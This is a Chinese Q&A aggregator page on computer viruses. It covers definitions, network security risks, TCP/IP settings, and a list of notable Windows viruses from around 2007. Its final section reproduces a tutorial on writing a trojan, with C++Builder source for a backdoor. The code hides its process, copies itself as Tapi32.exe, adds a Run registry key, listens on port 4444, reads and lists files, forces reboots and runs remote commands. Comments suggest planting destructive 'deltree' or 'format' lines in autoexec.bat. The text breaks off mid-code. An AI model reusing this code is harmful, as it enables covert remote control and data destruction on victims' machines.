當前位置:首頁 » 手機網路 » 網路協議電腦病毒
擴展閱讀
北京移動網路出故障 2025-10-20 08:58:18
西鄉網站製作多少錢 2025-10-20 08:54:23

網路協議電腦病毒

發布時間: 2022-11-01 22:39:13

『壹』 什麼是電腦病毒名詞解釋

編制或者在計算機程序中插入的破壞計算機功能或者破壞數據,影響計算機使用並且能夠自我復制的一組計算機指令或者程序代碼被稱為計算機病毒(Computer Virus)。具有破壞性,復制性和傳染性。
希望我的回答能幫助到您^_^
需要幫助請追問或者HI我

『貳』 常見的網路安全風險有哪些

網路安全可以從狹義及廣義兩個定位進行分析。狹義方面,網路安全主要可以分為軟硬體安全及數據安全,網路安全指的是網路信息安全,需對其中數據進行保護,保證相關程序不會被惡意攻擊,以免出現不能正常運行的情況;廣義方面,會直接涉及到網路信息的保密性及安全完整性,會隨重視角度變化而變化。

1、計算機技術方面

網路設備及系統安全是網路系統中安全問題的潛在問題,計算機系統實際運行中會因為自身設備因素,導致相應安全問題的出現。除此之外,網路信息技術相關優勢一般會體現在信息資源共享及資源開放上,所以更容易被侵襲,計算機網路協議在整體安全方面也存在潛在問題。

2、由於病毒引起的安全風險

計算機網路安全中最常出現的問題為病毒,病毒是由黑客進行編寫的計算機代碼或計算機指令,可以對計算機中相關數據造成嚴重破壞。按照數據實際摧毀力度分析,可以分為良性及惡性,這兩種病毒都能夠進行迅速傳播,具有較強的摧毀性能力,病毒可進行自行復制。現代社會計算機網路逐漸普及,病毒在網路上的傳播也更加迅速,通過網頁瀏覽或郵件傳播等,都可以受到病毒影響,使得計算機系統內部收到計算機病毒攻擊而癱瘓。

3、用戶問題

目前我國網路用戶對安全問題沒有較為清晰的認識及正確的態度,使用非法網站、下載安全風險較大的文件、不經常清除病毒、為設置安全保護軟體及防火牆等問題,用戶的不重視很容易讓黑客對網路安全進行攻擊。互聯網用戶使用網路時,並不能看到病毒,所以對病毒問題沒有足夠的重視,也缺乏相關防範意識。用戶一般情況下只能看到網路帶來的便利,忽視安全問題,部分用戶不注重隱私保護,隨意泄露隱私,所以近年來網路欺詐事件層出不窮。

『叄』 本地連接INTERNET協議(TCP/IP)設置好後比較容易中病毒嗎它要怎麼設置

設置成固定IP
地址確實容易中毒(ARP病毒)。
INTERNET協議(TCP/IP)主要設置如下選項:
IP地址,子網掩碼,默認網關,兩個DNS,
具體設置哪些數字,要和你的網路管理員聯系了。
要是家裡,就不要設置了。保持默認吧。

『肆』 電腦中了病毒 殺毒後 網路受限制或無連接

如提示網路連接受限制或無連接,可按以下方法操作:
1、打開電腦「控制面板」,點擊「網路連接」,選擇本地連接,右鍵點擊本地連接圖標後選「屬性」,在「常規」選項卡中雙擊「Internet協議 (TCP/IP)」,選擇「使用下面的IP地址」,在IP地址中填寫「192.168.0.1」,在子網掩碼中填寫255.255.255.0,其他不用填寫,然後點「確定」即可。需要注意的是,IP一定要保證和Modem的IP地址處於同一網段。
2、另外,在以上步驟中,在「本地連接」的「屬性」里把「此連接被限制或無連接時通知我(M)」的選項去掉也可以。

『伍』 計算機病毒的感染途徑有很多主要有。A網路協議 B隨便使用他人的移動存儲 C使用盜版軟體 D利

您好:

病毒感染計算機的途徑有A網路協議 B隨便使用他人的移動存儲 C使用盜版軟體,病毒的感染途徑雖然比較多,但是您可以使用騰訊電腦管家保護您的電腦防止病毒入侵,騰訊電腦管家是採用「 4+1 」核「芯」殺毒引擎的專業殺毒軟體,殺毒防毒能力強,騰訊電腦管家還有清理垃圾、電腦加速、修復漏洞、軟體管理、電腦診所等電腦管理功能,您可以點擊這里下載最新版的騰訊電腦管家:最新版騰訊電腦管家下載


騰訊電腦管家企業平台:http://..com/c/guanjia/

『陸』 世界最強的十大電腦病毒是什麼

一、ANI病毒 病毒名稱:Exploit.ANIfile 病毒中文名:ANI病毒 病毒類型:蠕蟲 危險級別:★★ 影響平台:Windows 2000/XP/2003/Vista 描述: 以Exploit.ANIfile.b為例,「ANI毒」變種b是一個利用微軟Windows系統ANI文件處理漏洞(MS07-017)進行傳播的網路蠕蟲。「ANI毒」變種b運行後,自我復制到系統目錄下。修改注冊表,實現開機自啟動。感染正常的可執行文件和本地網頁文件,並下載大量木馬程序。感染本地磁碟和網路共享目錄下的多種類型的網頁文件(包括*.HTML,*.ASPX,*.HTM,*.PHP,*.JSP,*.ASP),植入利用ANI文件處理漏洞的惡意代碼。自我復制到各邏輯盤根目錄下,並創建autorun.inf自動播放配置文件。雙擊盤符即可激活病毒,造成再次感染。修改hosts文件,屏蔽多個網址,這些網址大多是以前用來傳播其它病毒的站點。另外,「ANI毒」變種b還可以利用自帶的SMTP引擎通過電子郵件進行傳播。 二、U盤寄生蟲 病毒名稱:Checker/Autorun 病毒中文名:U盤寄生蟲 病毒類型:蠕蟲 危險級別:★★ 影響平台:Win 9X/ME/NT/2000/XP/2003 描述:Checker/Autorun「U盤寄生蟲」是一個利用U盤等移動設備進行傳播的蠕蟲。「U盤寄生蟲」是針對autorun.inf這樣的自動播放文件的蠕蟲病毒。autorun.inf文件一般存在於U盤、MP3、移動硬碟和硬碟各個分區的根目錄下,當用戶雙擊U盤等設備的時候,該文件就會利用Windows系統的自動播放功能優先運行autorun.inf文件,而該文件就會立即執行所要載入的病毒程序,從而破壞用戶計算機,使用戶計算機遭受損失。 三、熊貓燒香 病毒名稱:Worm/Viking 病毒中文名:熊貓燒香 病毒類型:蠕蟲 危險級別:★★★ 影響平台:Win 9X/ME/NT/2000/XP/2003 描述:以Worm/Viking.qo.Html「威金」變種qo(熊貓燒香腳本病毒)為例,該病毒是由「熊貓燒香」蠕蟲病毒感染之後的帶毒網頁,該網頁會被「熊貓燒香」蠕蟲病毒注入一個iframe框架,框架內包含惡意網址引用 ,這樣,當用戶打開該網頁之後,如果IE瀏覽器沒有打上補丁,IE就會自動下載並且執行惡意網址中的病毒體,此時用戶電腦就會成為一個新的病毒傳播源,進而感染區域網中的其他用戶計算機。 四、「ARP」類病毒 病毒名稱:「ARP」類病毒 病毒中文名:「ARP」類病毒 病毒類型:木馬 危險級別:★★★ 影響平台:Win 9X/ME/NT/2000/XP/2003 描述:通過偽造IP地址和MAC地址實現ARP欺騙,能夠在網路中產生大量的ARP通信量使網路阻塞或者實現「man in the middle」 進行ARP重定向和嗅探攻擊。 用偽造源MAC地址發送ARP響應包,對ARP高速緩存機制的攻擊。當區域網內某台主機運行ARP欺騙的木馬程序時,會欺騙區域網內所有主機和路由器,讓所有上網的流量必須經過病毒主機。其他用戶原來直接通過路由器上網現在轉由通過病毒主機上網,切換的時候用戶會斷一次線。切換到病毒主機上網後,如果用戶已經登陸了傳奇伺服器,那麼病毒主機就會經常偽造斷線的假像,那麼用戶就得重新登錄傳奇伺服器,這樣病毒主機就可以盜號了。 五、代理木馬 病毒名稱:Trojan/Agent 病毒中文名:代理木馬 病毒類型:廣告程序 危險級別:★★ 影響平台:Win 9X/ME/NT/2000/XP/2003 描述:以「代理木馬」變種crd為例, Trojan/Agent.crd是一個盜取用戶機密信息的木馬程序。「代理木馬」變種crd運行後,自我復制到系統目錄下,文件名隨機生成。修改注冊表,實現開機自啟。從指定站點下載其它木馬,偵聽黑客指令,盜取用戶機密信息。 六、網游大盜 病毒名稱:Trojan/PSW.GamePass 病毒中文名:網游大盜 病毒類型:木馬 危險級別:★ 影響平台:Win 9X/ME/NT/2000/XP/2003 描述:以Trojan/PSW.GamePass.hvs為例,「網游大盜」變種hvs是一個木馬程序,專門盜取網路游戲玩家的帳號、密碼、裝備等。 七、鞋匠 病毒名稱:Adware/Clicker 病毒中文名:鞋匠 病毒類型:廣告程序 危險級別:★ 影響平台:Win 9X/ME/NT/2000/XP/2003 描述:以Adware/Clicker.je為例,「鞋匠」變種je是一個廣告程序,可彈出大量廣告信息,並在被感染計算機上下載其它病毒。「鞋匠」變種je運行後,在Windows目錄下創建病毒文件。修改注冊表,實現開機自啟。自我注冊為服務,服務的名稱隨機生成。偵聽黑客指令,連接指定站點,彈出大量廣告條幅,用戶一旦點擊帶毒廣告,立即在用戶計算機上安裝其它病毒。 八、廣告泡泡 病毒名稱:Adware/Boran 病毒中文名:廣告泡泡 病毒類型:廣告程序 危險級別:★★ 影響平台:Win 9X/ME/NT/2000/XP/2003 描述:以 Adware/Boran.e為例,「廣告泡泡」變種e是一個廣告程序,採用RootKit等底層技術編寫,一旦安裝,很難卸載徹底。該程序會在C:\Program Files\MMSAssist下釋放出病毒文件。在後台定時彈出廣告窗口,佔用系統資源,干擾用戶操作。 九、埃德羅 病毒名稱:TrojanDownloader 病毒中文名:埃德羅 病毒類型:廣告程序 危險級別:★ 影響平台:Win 2000/XP/2003 描述: Adware/Adload.ad「埃德羅」變種ad是一個廣告程序,在被感染計算機上強制安裝廣告。 十、IstBar腳本 病毒名稱:TrojanDownloader.JS.IstBar 病毒中文名:IstBar腳本 病毒類型:木馬下載器 危險級別:★★ 影響平台:Win 9X/ME/NT/2000/XP/2003 描述:TrojanDownloader.JS.IstBar.t「IstBar腳本」變種t是一個用JavaScript語言編寫的木馬下載器。「IstBar腳本」變種t運行後,在用戶的計算機中強行安裝IstBar工具條,造成用戶系統變慢,自動彈出廣告,強行鎖定用戶的IE首頁等等。 2007年上半年,江民反病毒中心共截獲新病毒73972種,另據江民病毒預警中心監測的數據顯示,1至6月全國共有14081895台計算機感染了病毒,其中感染木馬病毒電腦9489649台,占病毒感染電腦總數的 67.38%,感染廣告程序電腦1859165台,占病毒感染電腦總數的13.20%,感染後門程序電腦928294台,占病毒感染電腦總數的6.59%,蠕蟲病毒782380台,占病毒感染電腦總數的5.55%,監測發現漏洞攻擊代碼感染359772台,占病毒感染電腦總數的2.55%,腳本病毒感42346台,占病毒感染電腦總數的0.30%。 二、病毒疫情區域特徵明顯 魯、蘇、粵居前三 據江民病毒預警中心提供的數據顯示,2007年病毒疫情比較嚴重的地區排前十位的分別是:山東、江蘇、廣東、北京、四川、河南、湖南、遼寧、上海和浙江。 歷來山東、江蘇、廣東都是病毒疫情比較嚴重的地區,在上半年的地區疫情排行榜中,這三個省市更是名列前三甲。其中,山東省以988354個染毒數量高居榜首。去年的冠軍廣東省退居第三位。 三、U盤成病毒傳播主要途徑 由於U盤本身不會防毒,病毒很容易就會感染U盤,而當U盤插入電腦時還會自動播放,病毒就會即刻被自動運行。加之U盤的廣泛應用也為病毒的傳播提供了溫床,由於眾多電腦用戶通過接入U盤進行電腦數據互換時,沒有先進行病毒掃描的習慣,病毒開始瞄準了這一空檔藏身其中,「U盤寄生蟲」病毒一出現就以高感染率常居病毒榜前三甲。 國內首例通過U盤傳播的病毒出現在2003年。當年8月3日,江民科技反病毒中心宣布成功截獲首例通過U盤傳播的「不公平」(Worm/Unfair)病毒。「不公平」病毒是某大學學生為了抗議在學校實習報名過程中遭到的不公正待遇而編寫,病毒運行後強行向A盤或U盤寫入病毒體,與讀寫軟盤發出聲響不同,病毒寫入U盤時悄無聲息,悄悄潛伏,危害更大。U盤病毒的進一步傳播從2006年上半年開始,由於其時U盤已經廣泛應用,大部分電腦用戶通過U盤進行數據互換,多數人在U盤插入電腦前沒有進行病毒掃描,造成了U盤病毒的蔓延。進入2007年,「熊貓燒香」等重大病毒紛紛把U盤作為主要傳播途徑,越來越多的電腦用戶因為不當使用U盤感染病毒,2007年U盤等移動存儲設備已經成為計算機病毒傳播的主要途徑之一。 四、「ARP」類病毒未來發展新趨勢 在區域網中, ARP協議對網路安全具有重要的意義,通過ARP協議來完成IP地址轉換為MAC地址。這種病毒可通過偽造IP地址和MAC地址實現ARP欺騙,用偽造源MAC地址發送ARP響應包,攻擊者只要持續不斷的發出偽造的ARP響應包就能更改目標主機ARP緩存中的IP-MAC條目,就會造成網路中斷或中間人攻擊。 同時如果網頁帶毒,就會通過微軟的MS06-14和MS07-17兩個系統漏洞給電腦植入一個木馬下載器,而該木馬下載器會下載10多個惡性網游木馬,可以盜取包括魔獸世界、傳奇世界、征途、夢幻西遊、邊鋒游戲等在內的多款網路游戲帳號及密碼,給網路游戲玩家造成了極大的損失。 目前,「ARP」欺騙技術正在被越來越多的病毒所使用,成為區域網安全的新殺手。

『柒』 什麼是黑客什麼是電腦病毒是怎麼作的

什麼是計算機病毒
計算機病毒是一個程序,一段可執行碼。就像生物病毒一樣,計算機病毒有獨特的復制能力。計算機病毒可以很快地蔓
延,又常常難以根除。它們能把自身附著在各種類型的文件上。當文件被復制或從一個用戶傳送到另一個用戶時,它們就隨
同文件一起蔓延開來。

除復制能力外,某些計算機病毒還有其它一些共同特性:一個被污染的程序能夠傳送病毒載體。當你看到病毒載體似乎
僅僅表現在文字和圖象上時,它們可能也已毀壞了文件、再格式化了你的硬碟驅動或引發了其它類型的災害。若是病毒並不
寄生於一個污染程序,它仍然能通過占據存貯空間給你帶來麻煩,並降低你的計算機的全部性能。
可以從不同角度給出計算機病毒的定義。一種定義是通過磁碟、磁帶和網路等作為媒介傳播擴散,能「傳染」 其他程序
的程序。另一種是能夠實現自身復制且藉助一定的載體存在的具有潛伏性、傳染性和破壞性的程序。還有的定義是一種人為
製造的程序,它通過不同的途徑潛伏或寄生在存儲媒體(如磁碟、內存)或程序里。當某種條件或時機成熟時,它會自生復制
並傳播,使計算機的資源受到不同程序的破壞等等。這些說法在某種意義上借用了生物學病毒的概念,計算機病毒同生物病毒
所相似之處是能夠侵入計算機系統和網路,危害正常工作的「病原體」。它能夠對計算機系統進行各種破壞,同時能夠自我復
制, 具有傳染性。
所以, 計算機病毒就是能夠通過某種途徑潛伏在計算機存儲介質(或程序)里, 當達到某種條件時即被激活的具有對計
算機資源進行破壞作用的一組程序或指令集合。

參考:http://www.eboss.com/pages/winfile/FaQ/bing.html

木馬是如何編寫的(一)
武漢 周侃
特洛依木馬這個名詞大家應該不陌生,自從98年「死牛崇拜」黑客小組公布Back Orifice以來,木馬猶如平地上的驚雷,使在Dos??Windows時代中長大的中國網民從五彩繽紛的網路之夢中驚醒,終於認識到的網路也有它邪惡的一面,一時間人心惶惶。
我那時在《電腦報》上看到一篇文章,大意是一個菜鳥被人用BO控制了,嚇得整天吃不下飯、睡不著覺、上不了網,到處求救!呵呵,要知道,木馬(Trojan)的歷史是很悠久的:早在AT&T Unix和BSD Unix十分盛行的年代,木馬是由一些玩程式(主要是C)水平很高的年輕人(主要是老美)用C或Shell語言編寫的,基本是用來竊取登陸主機的口令,以取得更高的許可權。那時木馬的主要方法是誘騙??先修改你的.profile文件,植入木馬;當你登陸時將你敲入的口令字元存入一個文件,用Email的形式發到攻擊者的郵箱里。國內的年輕人大都是在盜版Dos的熏陶下長大的,對網路可以說很陌生。直到Win9x橫空出世,尤其是WinNt的普及,大大推動了網路事業的發展的時候,BO這個用三年後的眼光看起來有點簡單甚至可以說是簡陋的木馬(甚至在Win9x的「關閉程序」對話框可以看到進程)給了當時中國人極大的震撼,它在中國的網路安全方面可以說是一個劃時代的軟體。
自己編寫木馬,聽起來很Cool是不是?!木馬一定是由兩部分組成??伺服器程序(Server)和客戶端程序(Client),伺服器負責打開攻擊的道路,就像一個內奸特務;客戶端負責攻擊目標,兩者需要一定的網路協議來進行通訊(一般是TCP/IP協議)。為了讓大家更好的了解木馬攻擊技術,破除木馬的神秘感,我就來粗略講一講編寫木馬的技術並順便編寫一個例子木馬,使大家能更好地防範和查殺各種已知和未知的木馬。
首先是編程工具的選擇。目前流行的開發工具有C++Builder、VC、VB和Delphi,這里我們選用C++Builder(以下簡稱BCB);VC雖然好,但GUI設計太復雜,為了更好地突出我的例子,集中注意力在木馬的基本原理上,我們選用可視化的BCB;Delphi也不錯,但缺陷是不能繼承已有的資源(如「死牛崇拜」黑客小組公布的BO2000源代碼,是VC編寫的,網上俯拾皆是);VB嘛,談都不談??難道你還給受害者傳一個1兆多的動態鏈接庫??Msvbvm60.dll嗎?
啟動C++Builder 5.0企業版,新建一個工程,添加三個VCL控制項:一個是Internet頁中的Server Socket,另兩個是Fastnet頁中的NMFTP和NMSMTP。Server Socket的功能是用來使本程序變成一個伺服器程序,可以對外服務(對攻擊者敞開大門)。Socket最初是在Unix上出現的,後來微軟將它引入了Windows中(包括Win98和WinNt);後兩個控制項的作用是用來使程序具有FTP(File Transfer Protocol文件傳輸協議)和SMTP(Simple Mail Transfer Protocol簡單郵件傳輸協議)功能,大家一看都知道是使軟體具有上傳下載功能和發郵件功能的控制項。
Form窗體是可視的,這當然是不可思議的。不光佔去了大量的空間(光一個Form就有300K之大),而且使軟體可見,根本沒什麼作用。因此實際寫木馬時可以用一些技巧使程序不包含Form,就像Delphi用過程實現的小程序一般只有17K左右那樣。
我們首先應該讓我們的程序能夠隱身。雙擊Form,首先在FormCreate事件中添加可使木馬在Win9x的「關閉程序」對話框中隱藏的代碼。這看起來很神秘,其實說穿了不過是一種被稱之為Service的後台進程,它可以運行在較高的優先順序下,可以說是非常靠近系統核心的設備驅動程序中的那一種。因此,只要將我們的程序在進程資料庫中用RegisterServiceProcess()函數注冊成服務進程(Service Process)就可以了。不過該函數的聲明在Borland預先打包的頭文件中沒有,那麼我們只好自己來聲明這個位於KERNEL32.DLL中的鳥函數了。
首先判斷目標機的操作系統是Win9x還是WinNt:
{
DWORD dwVersion = GetVersion();
// 得到操作系統的版本號
if (dwVersion >= 0x80000000)
// 操作系統是Win9x,不是WinNt
{
typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);
file://定義RegisterServiceProcess()函數的原型
HINSTANCE hDLL;
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
hDLL = LoadLibrary("KERNEL32");
file://載入RegisterServiceProcess()函數所在的動態鏈接庫KERNEL32.DLL
lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");
file://得到RegisterServiceProcess()函數的地址
lpRegisterServiceProcess(GetCurrentProcessId(),1);
file://執行RegisterServiceProcess()函數,隱藏本進程
FreeLibrary(hDLL);
file://卸載動態鏈接庫
}
}
這樣就終於可以隱身了(害我敲了這么多代碼!)。為什麼要判斷操作系統呢?因為WinNt中的進程管理器可以對當前進程一覽無余,因此沒必要在WinNt下也使用以上代碼(不過你可以使用其他的方法,這個留到後面再講)。接著再將自己拷貝一份到%System%目錄下,例如:C:\Windows\System,並修改注冊表,以便啟動時自動載入:
{
char TempPath[MAX_PATH];
file://定義一個變數
GetSystemDirectory(TempPath ,MAX_PATH);
file://TempPath是system目錄緩沖區的地址,MAX_PATH是緩沖區的大小,得到目標機的System目錄路徑
SystemPath=AnsiString(TempPath);
file://格式化TempPath字元串,使之成為能供編譯器使用的樣式
CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE);
file://將自己拷貝到%System%目錄下,並改名為Tapi32.exe,偽裝起來
Registry=new TRegistry;
file://定義一個TRegistry對象,准備修改注冊表,這一步必不可少
Registry->RootKey=HKEY_LOCAL_MACHINE;
file://設置主鍵為HKEY_LOCAL_MACHINE
Registry->OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run",TRUE);
file://打開鍵值Software\\Microsoft\\Windows\\CurrentVersion\\Run,如果不存在,就創建之
try
{
file://如果以下語句發生異常,跳至catch,以避免程序崩潰
if(Registry->ReadString("crossbow")!=SystemPath+"\\Tapi32.exe")
Registry->WriteString("crossbow",SystemPath+"\\Tapi32.exe");
file://查找是否有「crossbow」字樣的鍵值,並且是否為拷貝的目錄%System%+Tapi32.exe
file://如果不是,就寫入以上鍵值和內容
}
catch(...)
{
file://如果有錯誤,什麼也不做
}
}

好,FormCreate過程完成了,這樣每次啟動都可以自動載入Tapi32.exe,並且在「關閉程序」對話框中看不見本進程了,木馬的雛形初現。
接著選中ServerSocket控制項,在左邊的Object Inspector中將Active改為true,這樣程序一啟動就打開特定埠,處於伺服器工作狀態。再將Port填入4444,這是木馬的埠號,當然你也可以用別的。但是你要注意不要用1024以下的低端埠,因為這樣不但可能會與基本網路協議使用的埠相沖突,而且很容易被發覺,因此盡量使用1024以上的高端埠(不過也有這樣一種技術,它故意使用特定埠,因為如果引起沖突,Windows也不會報錯 ^_^)。你可以看一看TNMFTP控制項使用的埠,是21號埠,這是FTP協議的專用控制埠(FTP Control Port);同理TNMSMTP的25號埠也是SMTP協議的專用埠。
再選中ServerSocket控制項,點擊Events頁,雙擊OnClientRead事件,敲入以下代碼:
{
FILE *fp=NULL;
char * content;
int times_of_try;
char TempFile[MAX_PATH];
file://定義了一堆待會兒要用到的變數
sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\Win369.BAT")).c_str());
file://在%System%下建立一個文本文件Win369.bat,作為臨時文件使用
AnsiString temp=Socket->ReceiveText();
file://接收客戶端(攻擊者,也就是你自己)傳來的數據
}
好,大門敞開了!接著就是修改目標機的各種配置了!^_^ 首先我們來修改Autoexec.bat和Config.sys吧:
{
if(temp.SubString(0,9)=="edit conf")
file://如果接受到的字元串的前9個字元是「edit conf」
{
int number=temp.Length();
file://得到字元串的長度
int file_name=atoi((temp.SubString(11,1)).c_str());
file://將第11個字元轉換成integer型,存入file_name變數
file://為什麼要取第11個字元,因為第10個字元是空格字元
content=(temp.SubString(12,number-11)+'\n').c_str();
file://餘下的字元串將被作為寫入的內容寫入目標文件
FILE *fp=NULL;
char filename[20];
chmod("c:\\autoexec.bat",S_IREADS_IWRITE);
chmod("c:\\config.sys",S_IREADS_IWRITE);
file://將兩個目標文件的屬性改為可讀可寫
if(file_name==1)
sprintf(filename,"%s","c:\\autoexec.bat");
file://如果第11個字元是1,就把Autoexec.bat格式化
else if(file_name==2)
sprintf(filename,"%s","c:\\config.sys");
file://如果第11個字元是1,就把Config.sys格式化
times_of_try=0;
file://定義計數器
while(fp==NULL)
{
file://如果指針是空
fp=fopen(filename,"a+");
file://如果文件不存在,創建之;如果存在,准備在其後添加
file://如果出錯,文件指針為空,這樣就會重復
times_of_try=times_of_try+1;
file://計數器加1
if(times_of_try>100)
{
file://如果已經試了100次了,仍未成功
Socket->SendText("Fail By Open File");
file://就發回「Fail By Open File」的錯誤信息
goto END;
file://跳至END處
}
}
fwrite(content,sizeof(char),strlen(content),fp);
file://寫入添加的語句,例如deltree/y C:或者format/q/autotest C:,夠毒吧?!
fclose(fp);
file://寫完後關閉目標文件
Socket->SendText("Sucess");
file://然後發回「Success」的成功信息
}
}

上回我們講到如何修改目標機上的啟動配置文件,這回我們就來查看目標機上的目錄樹和文件吧,這在客戶端上使用「dir」命令,跟著敲?:
{
else if(temp.SubString(0,3)=="dir")
{
file://如果前3個字元是「dir」
int Read_Num;
char * CR_LF="\n";
int attrib;
char *filename;
DIR *dir;
struct dirent *ent;
int number=temp.Length();
file://得到字元串的長度
AnsiString Dir_Name=temp.SubString(5,number-3);
file://從字元串第六個字元開始,將後面的字元存入Dir_Name變數,這是目錄名
if(Dir_Name=="")
{
file://如果目錄名為空
Socket->SendText("Fail By Open DIR's Name");
file://返回「Fail By Open DIR's Name」信息
goto END;
file://跳到END
}
char * dirname;
dirname=Dir_Name.c_str();
if ((dir = opendir(dirname)) == NULL)
{
file://如果打開目錄出錯
Socket->SendText("Fail by your DIR's name!");
file://返回「Fail By Your DIR's Name」信息
goto END;
file://跳到END
}
times_of_try=0;
while(fp==NULL)
{
file://如果指針是NULL
fp=fopen(TempFile,"w+");
file://就創建system\Win369.bat准備讀和寫;如果此文件已存在,則會被覆蓋
times_of_try=times_of_try+1;
file://計數器加1
if(times_of_try>100)
{
file://如果已經試了100次了,仍未成功(真有耐心!)
Socket->SendText("Fail By Open File");
file://就發回「Fail By Open File」的錯誤信息
goto END;
file://並跳到END處
}
}
while ((ent = readdir(dir)) != NULL)
{
file://如果訪問目標目錄成功
if(*(AnsiString(dirname)).AnsiLastChar()!='\\')
file://如果最後一個字元不是「\」,證明不是根目錄
filename=(AnsiString(dirname)+"\\"+ent->d_name).c_str();
file://加上「\」字元後將指針指向目錄流
else
filename=(AnsiString(dirname)+ent->d_name).c_str();
file://如果是根目錄,則不用加「\」
attrib=_rtl_chmod(filename, 0);
file://得到目標文件的訪問屬性
if (attrib & FA_RDONLY)
file://「&」字元是比較前後兩個變數,如果相同返回1,否則返回0
fwrite(" R",sizeof(char),3,fp);
file://將目標文件屬性設為只讀
else
fwrite(" ",sizeof(char),3,fp);
file://失敗則寫入空格
if (attrib & FA_HIDDEN)
fwrite("H",sizeof(char),1,fp);
file://將目標文件屬性設為隱藏
else
fwrite(" ",sizeof(char),1,fp);
file://失敗則寫入空格
if (attrib & FA_SYSTEM)
fwrite("S",sizeof(char),1,fp);
file://將目標文件屬性設為系統
else
fwrite(" ",sizeof(char),1,fp);
file://失敗則寫入空格
if (attrib & FA_ARCH)
fwrite("A",sizeof(char),1,fp);
file://將目標文件屬性設為普通
else
fwrite(" ",sizeof(char),1,fp);
file://失敗則寫入空格
if (attrib & FA_DIREC)
fwrite(" <DIR> ",sizeof(char),9,fp);
file://將目標文件屬性設為目錄
else
fwrite(" ",sizeof(char),9,fp);
file://失敗則寫入空格
fwrite(ent->d_name,sizeof(char),strlen(ent->d_name),fp);
file://將目錄名寫入目標文件
fwrite(CR_LF,1,1,fp);
file://寫入換行
}
fclose(fp);
file://關閉文件
closedir(dir);
file://關閉目錄
FILE *fp1=NULL;
times_of_try=0;
while(fp1==NULL)
{
fp1=fopen(TempFile,"r");
file://打開Win369.bat准備讀
times_of_try=times_of_try+1;
file://計數器加1
if(times_of_try>100)
{
file://如果已經試了100次了,仍未成功
Socket->SendText("Fail By Open File");
file://就發回「Fail By Open File」的錯誤信息
goto END;
file://並跳到END處
}
}
AnsiString Return_Text="";
char temp_content[300];
for(int i=0;i<300;i++) temp_content[i]='\0';
file://定義的一個空數組
Read_Num=fread(temp_content,1,300,fp1);
file://從目標文件中讀入前300個字元
while(Read_Num==300)
{
Return_Text=Return_Text+temp_content;
file://Return_Text變數加上剛才的300個字元
for(int i=0;i<300;i++) temp_content[i]='\0';
Read_Num=fread(temp_content,1,300,fp1);
file://重復
};
Return_Text=Return_Text+temp_content;
file://Return_Text變數加上剛才的300個字元
fclose(fp1);
file://關閉目標文件
Socket->SendText(Return_Text);
file://返回Return_Text變數的內容
}
}
夠長吧?!察看目錄樹這么費勁啊?!你後面可以用BCB中的各種列表框對Client.exe好好美化美化。接下來就是查看指定文件的內容了,Client將使用「type」命令,(手指累不累啊?):
{
else if(temp.SubString(0,4)=="type")
{
file://如果前4個字元是「type」
int Read_Num;
int number=temp.Length();
AnsiString File_Name=temp.SubString(6,number-4);
file://將目標文件流存入File_Name變數中
times_of_try=0;
while(fp==NULL)
{
fp=fopen(File_Name.c_str(),"r");
file://打開目標文件准備讀
times_of_try=times_of_try+1;
file://計數器加1
if(times_of_try>100)
{
file://如果已試了100次了
Socket->SendText("Fail By Open File");
file://返回「Fail By Open File」的錯誤信息
goto END;
file://跳到END
}
}
AnsiString Return_Text="";
char temp_content[300];
for(int i=0;i<300;i++) temp_content[i]='\0';
file://定義一個空數組
Read_Num=fread(temp_content,1,300,fp);
file://從目標文件中讀入前300個字元
while(Read_Num==300)
{
Return_Text=Return_Text+temp_content;
file://Return_Text的內容加上剛才的字元
for(int i=0;i<300;i++) temp_content[i]='\0';
Read_Num=fread(temp_content,1,300,fp);
file://重復
};
Return_Text=Return_Text+temp_content;
file://Return_Text的內容加上剛才的字元
fclose(fp);
file://關閉目標文件
Socket->SendText(Return_Text);
file://返回Return_Text的內容,即你查看文件的內容
}
}
咳咳!累死了!還是來點輕松的吧??操縱目標機的光碟機(注意:mciSendString()函數的聲明在mmsystem.h頭文件中):
{
else if(temp=="open")
{
file://如果收到的temp的內容是「open」
mciSendString("set cdaudio door open", NULL, 0, NULL);
file://就彈出光碟機的托盤
}
else if(temp=="close")
{
file://如果收到的temp的內容是「close」
mciSendString("Set cdaudio door closed wait", NULL, 0, NULL);
file://就收入光碟機的托盤。當然你也可以搞個死循環,讓他的光碟機好好活動活動!^_^
}
}
接著就是交換目標機的滑鼠左右鍵,代碼如下:
{
else if(temp=="swap")
{
SwapMouseButton(1);
file://交換滑鼠左右鍵,簡單吧?
}
}
然後就是使目標機重新啟動。但這里要區分WinNt和Win9x??NT非常注重系統每個進程的權利,一個普通的進程是不應具備有調用系統的權利的,因此我們要賦予本程序足夠的許可權:
{
else if(temp=="reboot")
{
file://如果收到的temp的內容是「temp」
DWORD dwVersion = GetVersion();
file://得到操作系統的版本號
if (dwVersion < 0x80000000)
{
file://操作系統是WinNt,不是Win9x
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
file://定義變數
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES TOKEN_QUERY, &hToken);
file://OpenProcessToken()這個函數的作用是打開一個進程的訪問令牌
file://GetCurrentProcess()函數的作用是得到本進程的句柄
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
file://LookupPrivilegeValue()的作用是修改進程的許可權
tkp.PrivilegeCount = 1;
file://賦給本進程特權
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);
file://AdjustTokenPrivileges()的作用是通知Windows NT修改本進程的權利
ExitWindowsEx(EWX_REBOOT EWX_FORCE, 0);
file://強行退出WinNt並重啟
}
else ExitWindowsEx(EWX_FORCE+EWX_REBOOT,0);
file://強行退出Win9x並重啟
}
}
如果以上都不是,就讓它在Dos窗口中執行傳來的命令:
{
else
{
file://如果都不是
char * CR_TF="\n";
times_of_try=0;
while(fp==NULL)
{
fp=fopen(TempFile,"w+");
file://創建Win369.bat,如果已存在就覆蓋
times_of_try=times_of_try+1;
file://計數器加1
if(times_of_try>100)
{
Socket->SendText("Fail By Open File");
